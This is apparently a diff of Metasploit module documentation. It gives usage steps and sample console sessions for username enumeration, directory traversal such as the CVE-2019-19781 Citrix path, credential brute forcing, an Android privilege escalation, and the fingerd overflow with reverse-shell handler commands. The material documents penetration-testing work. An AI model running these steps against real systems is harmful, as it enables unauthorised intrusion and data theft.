+This module determines if usernames are valid on a server running Apache with the `UserDir` directive enabled. 
+It takes advantage of Apache returning different error codes for usernames that do not exist and for usernames
+that exist but have no `public_html` directory.
+
+### Enabling  `UserDir` on Ubuntu 16.04 with Apache installed
+1. `sudo a2enmod userdir`
+2. `sudo service apache2 restart`
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/apache_userdir_enum```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```run```
+
+## Scenarios
+
+### Apache 2.4.18 on Ubuntu 16.04
+
+![apache_userdir_enum Demo](https://i.imgur.com/UZanfTI.gif)
+
+```
+msf5 > use auxiliary/scanner/http/apache_userdir_enum
+msf5 auxiliary(scanner/http/apache_userdir_enum) > set rhosts alderaan
+rhosts => alderaan
+msf5 auxiliary(scanner/http/apache_userdir_enum) > run
+
+[*] http://192.168.6.172/~ - Trying UserDir: ''
+[*] http://192.168.6.172/ - Apache UserDir: '' not found
+[*] http://192.168.6.172/~4Dgifts - Trying UserDir: '4Dgifts'
+[*] http://192.168.6.172/ - Apache UserDir: '4Dgifts' not found
+...
+[*] http://192.168.6.172/~zabbix - Trying UserDir: 'zabbix'
+[*] http://192.168.6.172/ - Apache UserDir: 'zabbix' not found
+[*] http://192.168.6.172/~vagrant - Trying UserDir: 'vagrant'
+[*] http://192.168.6.172/ - Apache UserDir: 'vagrant' not found
+[+] http://192.168.6.172/ - Users found: backup, bin, daemon, games, gnats, irc, list, lp, mail, man, messagebus, news, nobody, proxy, sshd, sync, sys, syslog, uucp
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -1,10 +1,9 @@
+## Vulnerable Application
+
 This module exploits a vulnerability found in Cisco Firepower Management console. A logged in
 user can abuse the report viewing feature to download an arbitrary file. Authentication is
 required to exploit this vulnerability.

-
-## Vulnerable Application
-
 This module was written specifically against Cisco Firepower Management 6.0.1 (build 1213) during
 development. To test, you may download the virtual appliance here:

@@ -26,6 +25,6 @@ admin:Admin123 by default:
 If the file is found, it will be saved in the loot directory. If not found, the module should
 print an error indicating so.

-## Demo
+## Scenarios

 ![cisco_download_demo](https://cloud.githubusercontent.com/assets/1170914/21782825/78ada38e-d67a-11e6-9b7b-c7b8e2956fba.gif)
@@ -0,0 +1,57 @@
+## Introduction
+
+An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. The vulnerability, tracked as CVE-2019-19781, allows for directory traversal. If exploited, it could allow an unauthenticated attacker to perform arbitrary code execution.
+
+Because vulnerable servers allow for directory traversal, they will accept the request `GET /vpn/../vpns/` and process it as a request for `GET /vpns/`, a directory that contains PERL scripts that can be targeted to allow for limited file writing on the vulnerable host.
+
+This module checks if a target server is vulnerable by issuing an HTTP GET request for `/vpn/../vpns/cfg/smb.conf`and then checking the response for `[global]` since this configuration file should contain global variables. If `[global]` is found, the server is vulnerable to CVE-2019-19781.
+
+## Verification Steps
+
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/citrix_dir_traversal`
+4. Do: `set RHOSTS [IP]`
+5. Do: `run`
+
+## Options
+
+1. `Proxies`. This option is not set by default.
+2. `RPORT`. The default setting is `80`. To use: `set RPORT [PORT]`
+3. `SSL`. The default setting is `false`.
+4. `THREADS`. The default setting is `1`.
+5. `VHOST`. This option is not set by default.
+6. `TARGETURI`. This option is the base path. `/` by default.
+7. `PATH`. This option is the traversal path. `/vpn/../vpns/cfg/smb.conf` by default.
+
+## Scenarios
+
+```
+msf5 auxiliary(scanner/http/citrix_dir_traversal) > options
+
+Module options (auxiliary/scanner/http/citrix_dir_traversal):
+
+   Name       Current Setting            Required  Description
+   ----       ---------------            --------  -----------
+   PATH       /vpn/../vpns/cfg/smb.conf  yes       Traversal path
+   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1                  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8080                       yes       The target port (TCP)
+   SSL        false                      no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                          yes       Base path
+   THREADS    1                          yes       The number of concurrent threads (max one per host)
+   VHOST                                 no        HTTP server virtual host
+
+msf5 auxiliary(scanner/http/citrix_dir_traversal) > run
+
+[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
+[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/citrix_dir_traversal) >
+```
+
+## References
+
+1. <https://nvd.nist.gov/vuln/detail/CVE-2019-19781>
+2. <https://support.citrix.com/article/CTX267027>
@@ -9,7 +9,7 @@ The device has at least two (2) users - admin and user. Due to an access control
 3. Do: ```set RPORT [PORT]```
 4. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/http/cnpilot_r_web_login_loot
@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application

 This module scans one or more web servers for interesting directories that can be further explored.

@@ -9,7 +9,7 @@ Related links :
 * https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904
 * http://download.oracle.com/glassfish/4.1/release/glassfish-4.1.zip - Download Oracle Glass Fish 4.1

-## Verification
+## Verification Steps

  1. Start msfconsole
  2. Do: ```use auxiliary/scanner/http/glassfish_traversal```
@@ -11,7 +11,7 @@ This module can abuse misconfigured web servers to upload and delete web content
 6. Do: ```set FILEDATA [PATH]```
 7. Do: ```run```

-## Options 
+## Options

 ### ACTION

@@ -1,13 +1,15 @@
-
-## Microsoft IIS shortname vulnerability scanner
-
-The vulnerability is caused by a tilde character `~` in a GET or OPTIONS request, which could allow remote attackers to disclose 8.3 filenames (short names). In 2010, Soroush Dalili and Ali Abbasnejad discovered the original bug (GET request) This was publicly disclosed in 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
-
 ## Vulnerable Application

-Older Microsoft IIS installations are vulnerable with GET, newer installations with OPTIONS
-  
-  
+The vulnerability is caused by a tilde character `~` in a GET or OPTIONS request, which could allow remote attackers
+to disclose 8.3 filenames (short names). In 2010, Soroush Dalili and Ali Abbasnejad discovered the original bug (GET request)
+this was publicly disclosed in 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
+
+Older Microsoft IIS installations are vulnerable with GET, newer installations with OPTIONS 
+
+### Remediation
+
+Create registry key `NtfsDisable8dot3NameCreation` at `HKLM\SYSTEM\CurrentControlSet\Control\FileSystem`, with a value of `1`
+
 ## Verification Steps

  1. Install IIS (default installations are vulnerable)
@@ -51,13 +53,3 @@ Older Microsoft IIS installations are vulnerable with GET, newer installations w
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host
 ```
-
-## Remediation
-
-Create registry key `NtfsDisable8dot3NameCreation` at `HKLM\SYSTEM\CurrentControlSet\Control\FileSystem`, with a value of `1`
-
-
-## References
-
-  * https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/
-  * https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability
@@ -12,7 +12,7 @@
  * [RIPS v0.54 Source](https://sourceforge.net/projects/rips-scanner/files/rips-0.54.zip/download)


-## Verification
+## Verification Steps

  1. Start `msfconsole`
  2. `use auxiliary/scanner/http/rips_traversal`
@@ -1,13 +1,11 @@
-## Description
+## Vulnerable Application

 This module exploits an unauthenticated directory traversal vulnerability, which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6.
 Spring Cloud Config listens by default on port 8888.

-### Vulnerable Application
-
 * https://github.com/spring-cloud/spring-cloud-config/archive/v2.1.1.RELEASE.zip

-## Verification
+## Verification Steps

 1. `./msfconsole`
 2. `use auxiliary/scanner/http/springcloud_traversal`
@@ -29,7 +27,3 @@ msf auxiliary(scanner/http/springcloud_traversal) > run
 [*] Auxiliary module execution completed
 msf auxiliary(scanner/http/springcloud_traversal) >
 ```
-
-## References
-
-* https://pivotal.io/security/cve-2019-3799
@@ -34,11 +34,15 @@ Affecting total.js package, versions:

 ## Options

-* **TARGETURI**: Path to Total.js App installation (“/” is the default)
-* **DEPTH**: Traversal depth (“1” is the default)
-* **FILE**: File to obtain (“databases/settings.json” is the default for Total.js CMS App)
+ **DEPTH**

-## Scenario
+  Traversal depth. Default is `1`
+
+ **FILE**
+
+  File to obtain. Default is `databases/settings.json`
+
+## Scenarios

 ### Tested on Total.js framework 3.2.0 and Total.js CMS 12.0.0

@@ -0,0 +1,34 @@
+## Description
+
+This module exploits an unauthenticated directory traversal vulnerability which exists in TVT network surveillance management software-1000 version 3.4.1. NVMS listens by default on port 80.
+
+### Vulnerable Application
+
+* http://en.tvt.net.cn/upload/service/NVMS1000.zip
+
+## Verification
+
+1. `./msfconsole`
+2. `use auxiliary/scanner/http/tvt_nvms_traversal`
+3. `set rhosts <rhost>`
+4. `run`
+
+## Scenarios
+
+### Tested against Windows 7 SP1
+
+```
+msf5 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS 192.168.43.152
+RHOSTS => 192.168.43.152
+msf5 auxiliary(scanner/http/tvt_nvms_traversal) > run
+
+[+] File saved in: /root/.msf4/loot/20191230124941_default_192.168.43.152_nvms.traversal_240600.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/tvt_nvms_traversal) >
+```
+
+## References
+
+* https://www.exploit-db.com/exploits/47774
+* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20085
@@ -1,15 +1,11 @@
-## Description
+## Vulnerable Application
+
  This module attempts to authenticate against a Wordpress-site (via 
  XMLRPC) using username and password combinations indicated by the 
  `USER_FILE`, `PASS_FILE`, and `USERPASS_FILE` options.

-## References
-* [https://codex.wordpress.org/XML-RPC_Support](https://codex.wordpress.org/XML-RPC_Support)
-* [http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/](http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/)
-
-## Vulnerable Application
-
 ### Setup using Docksal
+
 Install [Docksal](https://docksal.io/)

 Create a new WordPress installation using `fin project create`
@@ -11,8 +11,6 @@

 ## Verification Steps

-  Example steps in this format (is also in the PR):
-
  1. Install IBM MQ Server 7.5, 8, or 9
  2. Start msfconsole
  3. Do: ```use auxiliary/scanner/misc/ibm_mq_channel_brute```
@@ -21,7 +19,17 @@
  6. Do: ```set rport <port>```
  7. Do: ```run```
  
-  Example output:
+## Options
+
+  **The CHANNELS_FILE option**
+
+  This option should contain the path to a text file which contains a list of channel names that will be checked. One channel name per line.
+
+## Scenarios
+
+  This module can be used to identify a list of channel names that are configured on the Queue Manager. Additionally, the module will return whether each identified channel uses SSL and if it MQI type.
+  After obtaining a list of valid channel names, these can be used to further enumerate the MQ installation. For example, the ibm_mq_enum module can be executed using a valid channel name in order to obtain information regarding the Queue Manager.
+
  ```
  msf auxiliary(scanner/misc/ibm_mq_channel_brute) > run
  
@@ -35,14 +43,3 @@
 [*] Auxiliary module execution completed

  ```
-
-## Options
-
-  **The CHANNELS_FILE option**
-
-  This option should contain the path to a text file which contains a list of channel names that will be checked. One channel name per line.
-
-## Scenarios
-
-  This module can be used to identify a list of channel names that are configured on the Queue Manager. Additionally, the module will return whether each identified channel uses SSL and if it MQI type.
-  After obtaining a list of valid channel names, these can be used to further enumerate the MQ installation. For example, the ibm_mq_enum module can be executed using a valid channel name in order to obtain information regarding the Queue Manager.
@@ -1,5 +1,6 @@
 ## Vulnerable Application
-   * IBM Downloads page: https://developer.ibm.com/messaging/mq-downloads/
+
+  * IBM Downloads page: https://developer.ibm.com/messaging/mq-downloads/
  * Tested on IBM MQ 7.5, 8 and 9
  * Usage:
    * Download and install MQ Server
@@ -8,7 +9,7 @@
    * Run the module

 ## Verification Steps
-   Example steps in this format (is also in the PR):
+
  1. Install IBM MQ Server 7.5, 8, or 9
  2. Start msfconsole
  3. Do: ```use auxiliary/scanner/misc/ibm_mq_enum```
@@ -16,8 +17,16 @@
  5. Do: ```set rhosts <target_IP>```
  6. Do: ```set rport <port>```
  7. Do: ```run```
-  
-  Example output:
+
+## Options
+
+### CHANNEL
+   
+   This option should contain the name of a valid MQ channel. This can be obtained using the module ```auxiliary/scanner/misc/ibm_mq_channel_brute```
+
+## Scenarios
+   This module can be used to obtain the Queue Manager name as well as the version of the MQ being used on the target host. When the Queue Manager name and a valid MQI channel name without SSL is known , the module ```auxiliary/scanner/misc/ibm_mq_login``` can be used to identify usernames that can authenticate to the Queue Manager.
+
 ```
 msf auxiliary(scanner/misc/ibm_mq_enum) > run

@@ -26,11 +35,3 @@ msf auxiliary(scanner/misc/ibm_mq_enum) > run
 [*] Auxiliary module execution completed

 ```
-
-## Options
-   **The CHANNEL option**
-   
-   This option should contain the name of a valid MQ channel. This can be obtained using the module ```auxiliary/scanner/misc/ibm_mq_channel_brute```
-
-## Scenarios
-   This module can be used to obtain the Queue Manager name as well as the version of the MQ being used on the target host. When the Queue Manager name and a valid MQI channel name without SSL is known , the module ```auxiliary/scanner/misc/ibm_mq_login``` can be used to identify usernames that can authenticate to the Queue Manager.
@@ -9,8 +9,8 @@
  * Allow remote connections for admin users by removing the CHLAUTH record that denies all users or configure access for a specific username.
  * Run the module
 
- ## Verification Steps
-  Example steps in this format (is also in the PR):
+## Verification Steps
+
  1. Install IBM MQ Server 7.5, 8, or 9
  2. Start msfconsole
  3. Do: ```use auxiliary/scanner/misc/ibm_mq_login```
@@ -21,7 +21,27 @@
  7. Do: ```set rport <port>```
  8. Do: ```run```
  
-  Example output:
+## Options
+
+### USERNAMES_FILE
+   
+   This option should contain the path to a text file which contains a list of usernames that will be checked. One username per line.
+   
+### QUEUE_MANAGER
+   
+   This option should contain the name of the target Queue Manager.
+   
+### CHANNEL
+   
+   This option should contain the name of a server-connection channel that will be used to connect to the Queue Manager.
+   
+## Scenarios
+
+   This module can be used to identify a list of usernames that are allowed to connect to the Queue Manager. This module requires the name of a valid server-connection channel, the Queue Manager's name which can be obtained by running the following 2 modules:
+   * ```auxiliary/scanner/misc/ibm_mq_channel_brute```
+   * ```auxiliary/scanner/misc/ibm_mq_enum```
+   After identifying a valid username, MQ Explorer can be used to connect to the Queue Manager using the information gathered.
+
  ```
 msf auxiliary(scanner/misc/ibm_mq_login) > run

@@ -33,21 +53,3 @@ msf auxiliary(scanner/misc/ibm_mq_login) > run
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
   ```
- ## Options
-   **The USERNAMES_FILE option**
-   
-   This option should contain the path to a text file which contains a list of usernames that will be checked. One username per line.
-   
-   **The QUEUE_MANAGER option**
-   
-   This option should contain the name of the target Queue Manager.
-   
-   **The CHANNEL option**
-   
-   This option should contain the name of a server-connection channel that will be used to connect to the Queue Manager.
-   
- ## Scenarios
-   This module can be used to identify a list of usernames that are allowed to connect to the Queue Manager. This module requires the name of a valid server-connection channel, the Queue Manager's name which can be obtained by running the following 2 modules:
-   * ```auxiliary/scanner/misc/ibm_mq_channel_brute```
-   * ```auxiliary/scanner/misc/ibm_mq_enum```
-   After identifying a valid username, MQ Explorer can be used to connect to the Queue Manager using the information gathered.
@@ -4,7 +4,7 @@ Exchange installations to enumerate email.

 Error-based user enumeration for Office 365 integrated email addresses

-## Verification
+## Verification Steps

 - Start `msfconsole`
 - `use auxiliary/scanner/msmail/exchange_enum`
@@ -11,7 +11,7 @@ OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks.

 **Note:**  Currently uses RHOSTS which resolves to an IP which is NOT desired, this is currently being fixed 

-## Verification
+## Verification Steps

 - Start `msfconsole`
 - `use auxiliary/scanner/msmail/host_id`
@@ -6,7 +6,7 @@ OWA (Outlook Webapp) is vulnerable to time-based user enumeration attacks.

 **Note:**  Currently uses RHOSTS which resolves to an IP which is NOT desired, this is currently being fixed 

-## Verification
+## Verification Steps

 - Start `msfconsole`
 - `use auxiliary/scanner/msmail/onprem_enum`
@@ -0,0 +1,104 @@
+## Vulnerable Application
+
+This module attempts to authenticate against an Oracle RDBMS instance using username and password
+combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. The default wordlist
+is [oracle_default_userpass.txt](https://github.com/rapid7/metasploit-framework/blob/master/data/wordlists/oracle_default_userpass.txt).
+
+Default port for SQL*Net listener is 1521/tcp. If this port is open, try this module to login.
+
+### Install
+
+This module needs nmap 5.50 or above to function.  However due to an [nmap bug](https://github.com/nmap/nmap/issues/1475) versions
+6.50-7.80 may not work.
+
+```
+nmap -V
+apt-get install nmap
+```
+
+In addition, if you encounter errors due to OCI libraries not being found, please see the
+[How to get Oracle Support working with Kali Linux](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux).
+
+For Oracle Server, please follow the following
+[guide](https://tutorialforlinux.com/2019/09/17/how-to-install-oracle-12c-r2-database-on-ubuntu-18-04-bionic-64-bit-easy-guide/).
+
+## Verification Steps
+
+  1. Install Oracle Database server and metasploit components
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/oracle/oracle_login```
+  4. Do: ```run```
+
+## Options
+
+  **BLANK_PASSWORDS**
+
+  Try blank passwords for all users
+
+  **BRUTEFORCE_SPEED**
+
+  How fast to bruteforce, scale of 0 to 5
+
+  **DB_ALL_CREDS**
+
+  Try each user/password couple stored in the current database
+
+  **DB_ALL_PASS**
+
+  Add all passwords in the current database to the list to try
+
+  **DB_ALL_USERS**
+
+  Add all users in the current database to the list to try
+
+  **NMAP_VERBOSE**
+
+  Display nmap output
+
+  **PASSWORD**
+
+  Specify one password to use for all usernames
+
+  **PASS_FILE**
+
+  File of passwords, one per line.
+
+  **RHOSTS**
+
+  Target hosts, range CIDR identifier, or hosts file with syntax 'file:<path>'
+
+  **RPORTS**
+
+  Ports of the target
+
+  **SID**
+
+  Instance (SID) to authenticate against. Default `XE`
+
+  **STOP_ON_SUCCESS**
+
+  Stop the bruteforce attack when a valid combination is found
+
+  **THREADS**
+
+  Number of concurrent threads (max of one per host)
+
+  **USERNAME**
+
+  Specific username to try for all passwords
+
+  **USERPASS_FILE**
+
+  File of username and passwords, separated by space, one set per line. Default `oracle_default_userpass.txt`
+
+  **USER_AS_PASS**
+
+  Try the username as the password for all users
+
+  **USER_FILE**
+
+  File containing usernames, one per line
+
+## Scenarios
+
+Unfortunately due to the nmap bug mentioned above, it was not possible to create an example run.
@@ -13,7 +13,7 @@ Detects a closed port via a RST received in response to the FIN
  XMAS scan requires the use of raw sockets, and thus cannot be performed from some Windows
  systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges.

-# Options
+## Options

  **PORTS**
  
@@ -34,7 +34,7 @@ Detects a closed port via a RST received in response to the FIN
  Gives detailed message about the scan of all the ports. It also shows the
  ports that were not open/filtered.

-# Verification Steps
+## Verification Steps

  1. Do: `use auxiliary/scanner/portscan/xmas`
  2. Do: `set RHOSTS [IP]`
@@ -42,7 +42,7 @@ Detects a closed port via a RST received in response to the FIN
  4. Do: `run`
  5. The open/filtered ports will be discovered, status will be printed indicating as such.

-# Scenarios
+## Scenarios
  
 ### Metaspliotable 2

@@ -57,7 +57,7 @@ IP, Subnetmask and Gateway are: 172.16.30.102, 255.255.0.0, 172.16.0.1
 [*] Auxiliary module execution completed
 ```

-## Module Options
+## Options
 ```
 msf auxiliary(profinet_siemens) > show options

@@ -31,7 +31,7 @@ Currently supported objects are:
  module user to view the output but also causes it to be written to disk before
  it is retrieved and deleted.

-## Scenario
+## Scenarios

 ```
 metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/dcomexec) > show options 
@@ -9,7 +9,7 @@
 1. Set: `RHOSTS`, `SMBUser`, `SMBPass`
 1. Do: `run`, see hashes from the remote machine

-## Scenario
+## Scenarios

 ```
 metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/secretsdump) > show options 
@@ -18,7 +18,7 @@
  module user to view the output but also causes it to be written to disk before
  it is retrieved and deleted.

-## Scenario
+## Scenarios

 ```
 metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/wmiexec) > show options 
@@ -7,7 +7,7 @@ Cambium cnPilot r200/r201 devices can be administered using SNMP. The device con
 3. Do: ```set COMMUNITY public```
 4. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/snmp/cnpilot_r_snmp_loot
@@ -11,7 +11,7 @@ Note: If the backup url is not retrieved, it is recommended to increase the TIME
 3. Do: ```set COMMUNTY [SNMP_COMMUNUTY_STRING]```
 4. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/snmp/epmp_snmp_loot
@@ -1,6 +1,6 @@
 Some TLS implementations handle errors processing RSA key exchanges and encryption (PKCS #1 v1.5 messages) in a broken way that leads an adaptive chosen-chiphertext attack. Attackers cannot recover a server's private key, but they can decrypt and sign messages with it. A strong oracle occurs when the TLS server does not strictly check message formatting and needs less than a million requests on average to decode a given ciphertext. A weak oracle server strictly checks message formatting and often requires many more requests to perform the attack.

-## Vulnerable Applications
+## Vulnerable Application

 * F5 BIG-IP 11.6.0-11.6.2 (fixed in 11.6.2 HF1), 12.0.0-12.1.2 HF1 (fixed in 12.1.2 HF2), or 13.0.0-13.0.0 HF2 (fixed in 13.0.0 HF3) (CVE 2017-6168)
 * Citrix NetScaler Gateway 10.5 before build 67.13, 11.0 before build 71.22, 11.1 before build 56.19, and 12.0 before build 53.22 (CVE 2017-17382)
@@ -12,7 +12,7 @@ The following versions of SenNet Data Logger and Electricity Meters, monitoring
 3. Do: ```set RPORT [PORT]```
 4. Do: ```run```

-## Sample Output
+## Scenarios

  ```
 msf > use auxiliary/scanner/telnet/satel_cmd_exec
@@ -0,0 +1,38 @@
+## Vulnerable Application
+
+This module dials a range of phone numbers and records audio from each answered call.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use modules/auxiliary/scanner/voice/recorder`
+3. Do: `set IAX_HOST [ip]`
+4. Do: `set OUTPUT_PATH [path]`
+5. Do: `set TARGETS [phone numbers]`
+6. Do: `run`
+
+## Scenarios
+
+ ```
+  msf > use modules/auxiliary/scanner/voice/recorder
+  msf auxiliary(scanner/voice/recorder) > set IAX_HOST 10.0.183.93
+    IAX_HOST => 10.0.183.93
+  msf auxiliary(scanner/voice/recorder) > set OUTPUT_PATH /root/audio
+    OUTPUT_PATH => /root/voice
+  msf auxiliary(scanner/voice/recorder) > set TARGETS 123-456-7890
+    TARGETS => 123-456-7890
+  msf auxiliary(scanner/voice/recorder) > run
+    [*] Dialing 123-456-7890...
+    [*]   Number: 123-456-7890 ringing  Frames 0 DTMF ''
+    [*]   Number: 123-456-7890 ringing  Frames 0 DTMF ''
+    [*]   Number: 123-456-7890 ringing  Frames 0 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 51 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 101 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 151 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 201 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 252 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 302 DTMF ''
+    [*]   Completed   Number: 123-456-7890  State: hangup Frames: 302 DTMF ''
+    [+] 123-456-7890 resulted in 15420 bytes of audio to /root/audio/123-456-7890.raw
+    [*] Auxiliary module execution completed
+  ```
@@ -1,7 +1,7 @@
 Browser Autopwn 2 is a complete redesign from the first one, so quite a few things will look and
 feel different for you. Here are the features you should know about before using.

-## Vulnerable Applications
+## Vulnerable Application

 Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins, such as:

@@ -1,4 +1,4 @@
-## Introduction
+## Vulnerable Application

 This module exploits a SQLi vulnerability found in
 OpenEMR version 5.0.1 Patch 6 and lower. The
@@ -10,18 +10,6 @@ This module saves each table as a `.csv` file in your
 loot directory and has been tested with
 OpenEMR 5.0.1 (3).

-
-## Author
-
-Will Porter (will.porter@lodestonesecurity.com) from Lodestone Security
-
-
-## References
-
-https://www.cvedetails.com/cve/CVE-2018-17179/
-https://github.com/openemr/openemr/commit/3e22d11c7175c1ebbf3d862545ce6fee18f70617
-
-
 ## Options

 ```
@@ -39,7 +27,7 @@ Module options (auxiliary/sqli/openemr/openemr_sqli_dump):
   VHOST                       no        HTTP server virtual host
 ```

-## Usage
+## Scenarios

 This module has both `check` and `run` functions.

@@ -0,0 +1,40 @@
+## Vulnerable Application
+
+This exploit module currently targets a very specific build of Android on specific set of hardware targets:
+
+ - Google Pixel 2 or Pixel XL 2 phones running the September 2019 security patch level.
+
+This exploit module would have to be retargeted for any other potentially vulnerable build or hardware target.
+
+One difficult issue with the Google Pixel 2 is that, while many Google phones have an unlocked bootloader, making it easy to download older Android revisions, the latest Pixel 2 updates show this feature has been disabled or broken [older revisions to the device firmware](https://developers.google.com/android/images). This may be a firmware bug or intentional, but Google themselves do not appear to have an answer [for the problem](https://support.google.com/pixelphone/thread/14920605?hl=en). For testing, you may need a phone never updated to a later Android revision.
+
+## Verification Steps
+
+ - Get an android meterpreter session on a Pixel 2 or Pixel XL 2 with the right kernel:
+
+ `msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j`
+
+ - Currently this only works on the Pixel 2 (and Pixel 2 XL) with september 2019 Security patch level. Validate the kernel version looks like this:
+
+```
+uname -a
+Linux localhost 4.4.177-g83bee1dc48e8 #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019 aarch64
+```
+
+ - Run the exploit:
+
+```
+msf5 exploit(multi/handler) > use exploit/android/local/binder_uaf
+msf5 exploit(android/local/binder_uaf) > set LHOST IPADDR
+msf5 exploit(android/local/binder_uaf) > set LPORT 4448 (different from your Android meterpreter port)
+LPORT => 4448
+msf5 exploit(android/local/binder_uaf) > set SESSION -1
+SESSION => -1
+msf5 exploit(android/local/binder_uaf) > run
+```
+
+ - **Verify** the new session can read and write private application data (in /data/data/..../)
+
+## Scenarios
+
+This module illustrates a privesc that, when chained with other exploit vectors, could turn an unprivileged sandboxed exploit into a sandbox escape and system compromise. Note that the target application may need to match the kernel CPU type, so for instance a 64-bit Chrome would need to be targeted with a 64-bit kernel.
@@ -1,4 +1,4 @@
-## Description
+## Vulnerable Application

 This module uses the su binary present on rooted devices to run a payload as root.

@@ -8,12 +8,10 @@ temporary directory, make it executable, execute it in the background, and final

 On most devices the su binary will pop-up a prompt on the device asking the user for permission.

-## Vulnerable Application
-
 This module will only work on *rooted* devices. An off the shelf Android device is unlikely to be rooted, however it's possible to root a device without losing the data.
 Many devices can be rooted by flashing new firmware, however the existing data will be lost.

-## Verfication steps
+## Scenarios

 You'll first need to obtain a session on the target device. To do this follow the instructions [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md)

@@ -1,10 +1,13 @@
-## Introduction
+## Vulnerable Application
+
+### Description

 This module exploits a stack buffer overflow in `fingerd` on 4.3BSD.
+
 This vulnerability was exploited by the Morris worm in 1988-11-02.
 Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.

-## Setup
+### Setup

 A Docker environment for 4.3BSD on VAX is available at
 <https://github.com/wvu/ye-olde-bsd>.
@@ -14,7 +17,7 @@ For manual setup, please follow the Computer History Wiki's
 Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
 you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

-## Targets
+### Targets

 ```
 Id  Name
@@ -22,6 +25,10 @@ Id  Name
 0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85
 ```

+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
 ## Options

 **RPORT**
@@ -31,46 +38,43 @@ port may be forwarded when NAT (SLiRP) is used in SIMH.

 **PAYLOAD**

-Set this to a BSD VAX payload. Currently only
+Set this to a BSD VAX payload. Currently, only
 `bsd/vax/shell_reverse_tcp` is supported.

-## Usage
+## Scenarios
+
+### `fingerd` 5.1 on 4.3BSD

 ```
-msf5 exploit(bsd/finger/morris_fingerd_bof) > options
+msf5 > use exploit/bsd/finger/morris_fingerd_bof
+msf5 exploit(bsd/finger/morris_fingerd_bof) > show missing

 Module options (exploit/bsd/finger/morris_fingerd_bof):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
-   RHOSTS  127.0.0.1        yes       The target address range or CIDR identifier
-   RPORT   79               yes       The target port (TCP)
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'


 Payload options (bsd/vax/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
-   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
-   LPORT  4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85
-
+   LHOST                   yes       The listen address (an interface may be specified)

+msf5 exploit(bsd/finger/morris_fingerd_bof) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(bsd/finger/morris_fingerd_bof) > set lhost 192.168.56.1
+lhost => 192.168.56.1
 msf5 exploit(bsd/finger/morris_fingerd_bof) > run

-[*] Started reverse TCP handler on 192.168.1.2:4444
+[*] Started reverse TCP handler on 192.168.56.1:4444
